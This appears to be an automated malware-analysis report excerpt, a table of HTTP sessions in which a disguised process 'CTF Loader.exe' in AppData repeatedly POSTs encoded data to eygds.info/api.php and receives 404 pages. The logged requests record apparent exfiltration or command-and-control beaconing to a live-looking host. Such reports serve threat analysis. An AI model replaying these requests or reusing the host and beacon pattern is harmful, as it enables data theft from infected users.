Dec 30, 2024 01:59:23.327030897 CET	2472	OUT	Data Raw: 66 4f 4a 39 42 6f 36 56 6d 31 4c 32 70 78 64 5a 64 4b 6b 6c 49 6b 66 50 6c 72 65 6e 57 4f 66 76 6f 6b 78 58 37 30 69 63 6e 6a 46 43 73 2f 66 46 68 54 5a 30 66 77 5a 54 41 63 74 50 32 55 62 63 52 6b 76 38 2f 6f 61 79 76 61 59 7a 25 32 42 50 4e 4f Data Ascii: fOJ9Bo6Vm1L2pxdZdKklIkfPlrenWOfvokxX70icnjFCs/fFhTZ0fwZTActP2UbcRkv8/oayvaYz%2BPNOyVjfLxeF44LwJ7%2BG0V3QmUDshse1bmkM0aOF76YtouHTLDAMAJurLb2N4FSP%2BM/0YATkBlM2lSZx7AJ6ZUjeNtge/j8umil86kpQYd3Gv5CfLlWA8DEwKeKLuaiWEdItuRvh0/TKPAbFg8eg4w9IssD/EPxwo
Dec 30, 2024 01:59:23.328644991 CET	9888	OUT	Data Raw: 37 79 69 30 4f 4c 37 38 53 41 49 61 36 52 38 39 74 4f 41 4c 54 31 45 6b 49 48 70 6d 2f 57 41 35 56 61 42 44 52 66 57 30 45 71 34 6e 59 48 65 42 7a 4a 39 5a 49 6b 73 44 6b 49 30 68 67 42 51 72 79 49 58 30 64 55 5a 77 77 30 71 69 64 53 38 46 45 48 Data Ascii: 7yi0OL78SAIa6R89tOALT1EkIHpm/WA5VaBDRfW0Eq4nYHeBzJ9ZIksDkI0hgBQryIX0dUZww0qidS8FEHdexhsLRFs66T%2BFTuyKgQOd80H/fIrq9gqEYro5XKASPSB7J3Mvohe%2BA7Q7xHbBV%2BrFM86rl16SB1uiiDCIjjOjvgQh/BX8Vk%2BLNGNS1dqs71hTmdyJLKzOG1vdee2D4gUZG16SmERUZKVvc9SLPYNduJC
Dec 30, 2024 01:59:23.328819990 CET	4944	OUT	Data Raw: 77 63 56 41 31 37 78 4f 70 5a 62 51 74 35 48 75 76 42 39 65 71 42 49 41 62 25 32 42 70 32 66 66 48 4a 77 50 5a 44 73 6a 59 4f 62 64 63 46 30 69 33 33 30 4b 6a 58 59 4e 36 6d 7a 67 46 6e 34 4a 69 70 67 44 57 6e 70 4a 4b 6a 41 4f 48 58 43 74 49 51 Data Ascii: wcVA17xOpZbQt5HuvB9eqBIAb%2Bp2ffHJwPZDsjYObdcF0i330KjXYN6mzgFn4JipgDWnpJKjAOHXCtIQctohD9zg0SfZGjVQEbD1KR%2BgVLwr7I%2BdpTa6F4j1v9wvcAwExZMk4hPox%2BvXH8B%2Bcc79m14YwecvEskWwT9gVqAJ7fkQMWRrmntlApm4OIK9zCuvirMrFSvBGI9OAP%2BJX89gP%2Bk6KVhllH3A5w/Xl
Dec 30, 2024 01:59:23.369239092 CET	34608	OUT	Data Raw: 63 51 6d 25 32 42 49 7a 6f 4f 36 76 4b 58 63 52 50 31 76 2f 31 63 38 5a 69 6a 70 44 73 2f 46 71 58 34 4b 72 42 45 46 62 6c 6b 4c 34 50 45 37 76 48 36 63 38 39 74 6a 61 2f 69 39 4c 70 72 73 53 67 30 33 59 35 6b 4d 7a 4d 50 55 4f 2f 4b 79 32 36 74 Data Ascii: cQm%2BIzoO6vKXcRP1v/1c8ZijpDs/FqX4KrBEFblkL4PE7vH6c89tja/i9LprsSg03Y5kMzMPUO/Ky26t0NXfn/D49kY067DN/nCTNtDdu50TSzjWp24c0Ns/oWMgQat5RgYfDZ42UIyu3Driu5I2XQfKGNety0yzpC58aZi5GpiTEwIWmhsq6Dpv/CMufnh8xBu9/6RdPdfPdyj/r86s/nbioGvq1jw9MetM3GOQ7BtL6aaUq
Dec 30, 2024 01:59:23.374190092 CET	22248	OUT	Data Raw: 50 54 52 73 51 30 42 6c 50 64 32 59 66 42 54 77 38 32 33 36 63 42 64 6c 78 31 59 64 30 62 5a 70 69 43 25 32 42 58 35 6c 4e 46 67 37 52 66 59 41 79 31 43 45 70 7a 7a 71 65 72 6c 4b 6f 78 48 72 47 56 36 67 53 6f 49 38 4d 47 72 5a 71 38 6d 70 42 44 Data Ascii: PTRsQ0BlPd2YfBTw8236cBdlx1Yd0bZpiC%2BX5lNFg7RfYAy1CEpzzqerlKoxHrGV6gSoI8MGrZq8mpBD8ROW8XXRLmjr1mWHH5ZCk8%2B35WJh5keP7Eg4oxyImAui1iyDX21ma%2B6H51Uj0tBxkczqK4nBcwTZeWdCCL7UbpVR9%2BBAWo02c0NbDqUIE9M2tsKAAZOGf11kC3/CBDcB2s0Im42v%2B4BSKiCx4SAO5Py6Q
Dec 30, 2024 01:59:23.374322891 CET	14832	OUT	Data Raw: 75 75 63 71 64 41 4a 61 51 70 6f 36 2f 6d 47 41 72 4e 25 32 42 4f 67 2f 51 66 38 30 48 64 4a 47 2f 77 56 74 69 44 48 73 58 6d 6f 66 33 51 69 72 47 69 4d 61 32 35 6c 78 53 38 6c 77 44 76 47 25 32 42 50 71 61 31 4d 7a 7a 61 65 34 4a 44 47 75 30 35 Data Ascii: uucqdAJaQpo6/mGArN%2BOg/Qf80HdJG/wVtiDHsXmof3QirGiMa25lxS8lwDvG%2BPqa1Mzzae4JDGu05CBgLTXcTyLdgmksxbTzQlgo8eliK/aPoTnZu6AJK6O4bghHsag%2BCH8PZWXDbaHKO1TVPW%2BgzCGGG5MPOSmGnOcgIG/ZnVKQ3zlaEoFjjFs0dszqReVTT9ADcrgGS/dzMVz4JY0eid4Rtd6m3VO86TADsMI/84
Dec 30, 2024 01:59:23.519098043 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:59:23.519252062 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:59:23 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50032	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:59:46.295042992 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue
Dec 30, 2024 01:59:46.646831989 CET	286	OUT	Data Raw: 70 3d 32 71 48 30 4b 42 48 48 6c 70 4d 72 49 79 6b 47 2f 59 56 69 37 4a 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=2qH0KBHHlpMrIykG/YVi7JV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5R%2BoQfDJYdxY%2BLeL4CfPUNjeMyQYy%2BhznJ/iR%2B8EfLeOyp5yqnHAxQIhLcFZI8Mkffz42B7krq2u7OXqqle7sxfGYqM4gionehlh7cV962TIKR3V7cktRe%2BNwMtZWMxPYK2AGL8riBZtj
Dec 30, 2024 01:59:46.835927010 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:59:46.836008072 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:59:46 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:59:46.836044073 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks
Dec 30, 2024 01:59:46.836078882 CET	316	IN	Data Raw: 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c Data Ascii: px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not
Dec 30, 2024 01:59:46.837250948 CET	257	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 124284 Expect: 100-continue
Dec 30, 2024 01:59:46.985860109 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:59:46.986197948 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:59:46 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http
Dec 30, 2024 01:59:46.986232996 CET	1236	IN	Data Raw: 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 Data Ascii: -equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your we
Dec 30, 2024 01:59:46.986248016 CET	12360	OUT	Data Raw: 70 3d 70 68 44 68 54 7a 34 6c 4b 64 71 69 49 61 55 69 41 71 4a 38 25 32 42 57 2f 4b 61 58 4b 50 5a 5a 6f 6e 73 79 4b 74 61 38 52 44 64 32 34 42 69 4c 7a 62 62 72 36 6e 47 6b 71 45 48 35 56 48 6f 4d 34 48 58 45 33 56 69 35 34 70 33 4f 77 4a 32 75 Data Ascii: p=phDhTz4lKdqiIaUiAqJ8%2BW/KaXKPZZonsyKta8RDd24BiLzbbr6nGkqEH5VHoM4HXE3Vi54p3OwJ2u7b1%2BuDbKYThHqXrdRys71yo6iq0YixgaeIBeH3s2RRtaIEBbsfP0YfRNNarEZc9oxWASh1iQjZ3pUh9yjMurmGJ5P3gl8S1YxwSnyegAQedvLEgjgOMA67lum/JMG87OCde36frctmOgvQnUovMamRRP%2BSSdu
Dec 30, 2024 01:59:46.986268997 CET	279	IN	Data Raw: 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: t.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not intentional.</p> </d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50033	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:59:46.296044111 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 318 Expect: 100-continue
Dec 30, 2024 01:59:46.646863937 CET	318	OUT	Data Raw: 70 3d 53 50 74 31 6f 66 78 74 4b 32 44 43 4d 33 76 36 48 52 54 61 63 6d 33 63 4e 6b 70 59 32 6f 30 74 64 45 33 70 58 52 25 32 42 69 6e 4d 7a 59 62 6c 48 35 41 74 35 59 38 62 56 30 72 41 69 44 59 37 4d 46 68 34 79 5a 7a 2f 55 6b 4a 45 44 6e 73 48 Data Ascii: p=SPt1ofxtK2DCM3v6HRTacm3cNkpY2o0tdE3pXR%2BinMzYblH5At5Y8bV0rAiDY7MFh4yZz/UkJEDnsHiWnAK5VejmZXtsIuHc6B80zWnIYfdXfpAz0lRPVgk6aCWwwi02LX4Yb/0Zd93ojmhbn3r3ad0Il0nvMjTt02Pe9RI5K5tzpxNMU6meKEHoOH%2BCCrwJE9NzmCefLQuoszSDLx8X8KJFwaeHhu7wW7bvMn83umqay
Dec 30, 2024 01:59:46.856312037 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:59:46.856540918 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:59:46 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:59:46.856575966 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks
Dec 30, 2024 01:59:46.856610060 CET	316	IN	Data Raw: 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c Data Ascii: px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50034	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:59:49.622874975 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue
Dec 30, 2024 01:59:49.974951982 CET	286	OUT	Data Raw: 70 3d 32 71 48 30 4b 42 48 48 6c 70 4d 72 49 79 6b 47 2f 59 56 69 37 4a 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=2qH0KBHHlpMrIykG/YVi7JV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5R%2BoQfDJYdxY%2BLeL4CfPUNjeMyQYy%2BhznJ/iR%2B8EfLeOyp5yqnHAxQIhLcFZI8Mkffz42B7krq2u7OXqqle7sxfGYqM4gionehlh7cV962TIKR3V7cktRe%2BNwMtZWMxPYK2AGL8riBZtj
Dec 30, 2024 01:59:50.167660952 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:59:50.167720079 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:59:50 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
